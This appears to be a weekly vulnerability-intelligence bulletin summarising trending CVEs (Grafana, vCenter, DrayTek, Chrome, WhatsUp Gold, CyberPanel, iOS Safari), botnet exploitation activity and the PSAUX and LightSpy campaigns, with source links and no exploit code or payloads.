In an unexpected turn, the CISA KEV list saw no new additions this week, leaving cybersecurity experts surprised. However, critical vulnerabilities were identified in Grafana OSS, VMware vCenter Server, and DrayTek Vigor routers, indicating that threats are still very much present.  In proactive measures, Google has patched a critical vulnerability reported by Apple, and the Progress community has released a fix for a significant flaw in WhatsUp Gold. Organizations must remain vigilant and ready to address these evolving security challenges.  

With the PSAUX ransomware and LightSpy macOS implants ramping up their activity this week, the urgency for organizations to fortify their cybersecurity strategies has never been more critical.

The IoT_Reaper botnet remains active, persistently exploiting a vulnerability in MVPower CCTV DVR models, while Zerobot has been discovered targeting a three-year-old flaw in the Apache HTTP server. Additionally, notable botnets such as Enemybot, LiquorBot, and the infamous Mirai are leveraging a nine-year-old vulnerability in D-Link DIR 645 routers.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-9264

A severe SQL injection vulnerability in Grafana’s experimental SQL Expressions feature permits authenticated users to execute arbitrary DuckDB SQL queries by adjusting dashboard expressions.  With a CVSS score of 9.9, this vulnerability impacts both Grafana OSS and Enterprise, and a PoC is currently available.

CVE-2024-38812

VMware vCenter Server contains a critical heap overflow vulnerability, allowing an attacker with network access to exploit it through specially crafted packets, possibly resulting in remote code execution. This vulnerability, affecting versions 8.0U3a and earlier, has a CVSS score of 9.8, and a proof-of-concept is available.

CVE-2024-48074

DrayTek Vigor2960 routers running firmware version 1.4.4 are impacted by a remote code execution vulnerability with a high CVSS score of 8.0. This flaw, if exploited successfully, could lead to data breaches, network disruption, malware spread, and botnet recruitment. The availability of proof-of-concept elevates the risk level, posing a critical threat to organizations.  

CVE-2024-10487

Google has addressed a high severity out-of-bounds write vulnerability in its Chrome browser, which has been assigned a CVSS score of 8.8. This flaw, reported by Apple, impacts versions prior to 130.0.6723.92 and is associated with the Dawn implementation.

CVE-2024-7763

A critical authentication bypass vulnerability in Progress Software's WhatsUp Gold, impacting versions prior to 2024.0.0 and assigned a CVSS score of 9.8, allows attackers to exploit the flaw to access encrypted user credentials, potentially resulting in further unauthorized access.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-51567, CVE-2024-51568 and CVE-2024-51378  

Threat actors are actively exploiting three critical remote code execution vulnerabilities in CyberPanel, a widely used web hosting control panel to compromise servers and deploy PSAUX ransomware. These vulnerabilities affecting versions 2.3.6 and 2.3.7 allow unauthenticated attackers to gain root access for full control over the impacted systems.  

CVE-2020-9802 and CVE-2020-3837

The LightSpy threat actor has broadened its focus to the iOS platform, targeting devices running up to version 13.3 by exploiting the publicly available Safari vulnerabilities CVE-2020-9802 for initial access and CVE-2020-3837 for privilege escalation, demonstrating its capacity for destruction through actions like wiping contact lists and disabling devices by removing critical system components.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.securityweek.com/google-patches-critical-chrome-vulnerability-reported-by-apple/  
2. https://securityonline.info/cve-2024-48074-rce-flaw-discovered-in-draytek-vigor2960-routers-poc-published/  
3. https://www.threatfabric.com/blogs/lightspy-implant-for-ios  
4. https://securityonline.info/psaux-ransomware-is-exploiting-two-max-severity-flaws-cve-2024-51567-cve-2024-51568-in-cyberpanel/  
5. https://securityonline.info/grafana-vulnerability-cve-2024-9264-poc-released-for-9-9-rated-critical-flaw/